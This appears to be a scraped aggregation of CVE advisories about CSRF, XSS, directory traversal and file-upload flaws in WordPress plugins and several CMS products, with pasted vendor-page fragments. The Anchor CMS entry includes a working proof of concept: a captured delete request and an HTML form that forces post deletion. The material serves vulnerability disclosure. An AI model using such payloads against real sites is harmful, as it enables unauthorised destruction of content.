The Church Admin WordPress plugin before 3.4.135 does not have authorisation and CSRF in some of its action as well as requested files, allowing unauthenticated attackers to repeatedly request the "refresh-backup" action, and simultaneously keep requesting a publicly accessible temporary file generated by the plugin in order to disclose the final backup filename, which can then be fetched by the attacker to download the backup of the plugin's DB data

CVE-2022-0833

The Menu Image, Icons made easy WordPress plugin before 3.0.8 does not have authorisation and CSRF checks when saving menu settings, and does not validate, sanitise and escape them. As a result, any authenticate users, such as subscriber can update the settings or arbitrary menu and put Cross-Site Scripting payloads in them which will be triggered in the related menu in the frontend

CVE-2022-0450

TypesetterCMS v5.1 was discovered to contain a Cross-Site Request Forgery (CSRF) which is exploited via a crafted POST request.

**News**

**elFinder 2.1.50 in Upcoming Release**

12/28/2019

A new release for Typesetter is in the works with a lot of improvements including the ... Read More

**Typesetter 5.1**

8/12/2017

Typesetter 5.1 is now available for download. 5.1 includes bug fixes, UI/UX improvements, ... Read More

More News

CVE-2022-25523: User - Typesetter CMS

phpIPAM 1.4.4 allows Reflected XSS and CSRF via app/admin/subnets/find_free_section_subnets.php of the subnets functionality.

**Nossos números:**

**3,5MM+**Anomalias reportadas  
aos clientes em 2020**450+**Pessoas em Recife, São  
Paulo, Rio e Londres**500+**Clientes no Brasil, UK,  
LATAM e Europa**21+**Anos de experiência  

**Principais Serviços**

 

**Security Consulting**

Projetos de avaliações, testes e diagnósticos de resiliência e cibersegurança.

Saiba Mais

 

**Security Integration**

Desenhamos, instalamos e configuramos as soluções de segurança próprias e de parceiros, respeitando o fluxo do seu negócio.

Saiba Mais

 

**Managed Security Services**

Temos inteligência, tecnologias e profissionais altamente qualificados para apoiar sua empresa com projetos contínuos.

Saiba Mais

 

**Digital Identity**

O AllowMe agrega proteção e confiança à relação digital entre empresas e seus clientes.

Saiba Mais

**Trabalhamos com importantes parceiros de negócios para oferecer as melhores ferramentas em cibersegurança.**

Nosso portfólio de ponta a ponta inclui as soluções tecnológicas mais inovadoras do mercado desenvolvidas pelos maiores fabricantes internacionais.

Saiba mais

Assine nossa newsletter

Cadastre-se para receber novidades

CVE-2021-46426: Home - Tempest - Líder em Segurança Digital no Brasil!

**Nossos números:**

**3,5MM+**Anomalias reportadas  
aos clientes em 2020**450+**Pessoas em Recife, São  
Paulo, Rio e Londres**500+**Clientes no Brasil, UK,  
LATAM e Europa**21+**Anos de experiência  

**Principais Serviços**

 ![](https://www.tempest.com.br/wp-content/uploads/2021/03/Icons_verde-13.png) ![](https://www.tempest.com.br/wp-content/uploads/2021/01/Imagem7.png)

**Security Consulting**

Projetos de avaliações, testes e diagnósticos de resiliência e cibersegurança.

Saiba Mais

 ![](https://www.tempest.com.br/wp-content/uploads/2021/03/Icons_verde-07.png) ![](https://www.tempest.com.br/wp-content/uploads/2021/01/usecase-buider.png)

**Security Integration**

Desenhamos, instalamos e configuramos as soluções de segurança próprias e de parceiros, respeitando o fluxo do seu negócio.

Saiba Mais

 ![](https://www.tempest.com.br/wp-content/uploads/2021/03/Icons_verde-09.png) ![](https://www.tempest.com.br/wp-content/uploads/2021/01/Imagem12.png)

**Managed Security Services**

Temos inteligência, tecnologias e profissionais altamente qualificados para apoiar sua empresa com projetos contínuos.

Saiba Mais

 ![](https://www.tempest.com.br/wp-content/uploads/2021/03/Icons_verde-08.png) ![](https://www.tempest.com.br/wp-content/uploads/2021/01/Imagem4.png)

**Digital Identity**

O AllowMe agrega proteção e confiança à relação digital entre empresas e seus clientes.

Saiba Mais

**Trabalhamos com importantes parceiros de negócios para oferecer as melhores ferramentas em cibersegurança.**

Nosso portfólio de ponta a ponta inclui as soluções tecnológicas mais inovadoras do mercado desenvolvidas pelos maiores fabricantes internacionais.

Saiba mais

Assine nossa newsletter

Cadastre-se para receber novidades

Anchor CMS v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component anchor/routes/posts.php. This vulnerability allows attackers to arbitrarily delete posts.

**anchorcms-0.12.7-CSRF**

CSRF (Cross-site request forgery) Vulnerability discovered in Anchor CMS v0.12.7 and that can delete posts.

**Vulnerability Analysis**

Request interface for adding, deleting, modifying and checking posts in anchor/routes/posts.php.

let us see code it delete a posts.

https://github.com/anchorcms/anchor-cms/blob/master/anchor/routes/posts.php#L355

        /**
         * Delete post
         */
        Route::get('admin/posts/delete/(:num)', function ($id) {
            Post::find($id)->delete();
            Comment::where('post', '=', $id)->delete();
    
            Query::table(Base::table('post_meta'))
                 ->where('post', '=', $id)
                 ->delete();
    
            Notify::success(__('posts.deleted'));
    
            return Response::redirect('admin/posts');
        });
    

There is no check on token or referer and delete directly.

**Reproduce and PoC**

1.  Login in as a admin.
2.  create some posts for deleteing
3.  use brupsuite get a delete request packet

    GET /admin/posts/delete/6 HTTP/1.1
    Host: 192.168.1.89
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://192.168.1.89/admin/posts/edit/3
    Cookie: anchorcms=ng848botkffiu4c1lrgbgo50ri
    Upgrade-Insecure-Requests: 1
    
    

The request just delete a posts that id is 6.

4.  use brupsuite to generat a csrf PoC.

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://192.168.1.89/admin/posts/delete/6">
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

Then save the PoC code to a exploit.html, and click exploit.html to csrf attack. ![1](https://user-images.githubusercontent.com/11525772/154665895-36b7575d-368d-495c-830e-80fc17bc02c0.jpg)

click it to send a request and delete it successfully. ![1645180292(1)](https://user-images.githubusercontent.com/11525772/154665976-e329e3d5-b820-43fa-a9c3-d8dce7f085b1.jpg)

CVE-2022-25576: GitHub - butterflyhack/anchorcms-0.12.7-CSRF: Vulnerability Analysis

Passwork On-Premise Edition before 4.6.13 has multiple XSS issues.

CVE-2022-25266

Passwork On-Premise Edition before 4.6.13 allows migration/downloadExportFile Directory Traversal (to read files).

After authorization with the Owner account, it will be possible to read files located outside the web directory on the server

Discoverer: Positive technologies, Arian Rakhimi

CVE-2022-25267

Passwork On-Premise Edition before 4.6.13 allows migration/uploadExportFile Directory Traversal (to upload files).

After logging in with the Owner account, an intruder has the ability to upload arbitrary files by sending specially generated HTTP requests

Discoverer: Positive technologies, Arian Rakhimi

CVE-2022-25268

Passwork On-Premise Edition before 4.6.13 allows CSRF via the groups, password, and history subsystems.

CSRF token value does not change during the session and can be obtained by an attacker as a result of exploitation of the "Cross-site scripting" vulnerability.

Discoverer: Positive technologies, Arian Rakhimi

CVE-2022-25269

Passwork On-Premise Edition before 4.6.13 has multiple XSS issues.

An attacker can inject arbitrary HTML tags, including JavaScript scripts, into a page processed by a user's browser

Discoverer: Positive technologies, Roman Poneev

CVE-2022-25269: Description of CVE-2022-25266, CVE-2022-25267, CVE-2022-25268, CVE-2022-25269

Cross-Site Request Forgery (CSRF) in Yoo Slider – Image Slider & Video Slider (WordPress plugin) allows attackers to trick authenticated users into unwanted slider duplicate or delete action.

**yoo-slider**

**Software**

**Yoo Slider**

**Vulnerable Versions**

**<= 2.0.0**

**Fixed in version**

**2.1.0**

**CVE**

**CVE-2022-25608**

**References**

**Credits**

**Classification**

**Cross Site Request Forgery (CSRF)**

**OWASP Top 10**

**A5: Broken Access Control**

**Disclosure Date**

**2022-03-21**

**CVSS 3.0 score**

**Are your websites subject to this vulnerability?**

**Details**

**Cross-Site Request Forgery (CSRF) vulnerability leading to slider Duplicate/Delete discovered by Ngo Van Thien (Patchstack Alliance) in WordPress Yoo Slider plugin (versions <= 2.0.0).**

**Solution**

**Update the WordPress Yoo Slider plugin to the latest available version (at least 2.1.0).**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-25608: WordPress Yoo Slider plugin <= 2.0.0 - Cross-Site Request Forgery (CSRF) vulnerability leading to slider Duplicate/Delete - Patchstack

The Ninja Forms - File Uploads Extension WordPress plugin is vulnerable to reflected cross-site scripting due to missing sanitization of the files filename parameter found in the ~/includes/ajax/controllers/uploads.php file which can be used by unauthenticated attackers to add malicious web scripts to vulnerable WordPress sites, in versions up to and including 3.3.12.

CVE-2022-0889: Vulnerability Advisories - Wordfence

The Ninja Forms - File Uploads Extension WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/includes/ajax/controllers/uploads.php file which can be bypassed making it possible for unauthenticated attackers to upload malicious files that can be used to obtain remote code execution, in versions up to and including 3.3.0

Tag

#csrf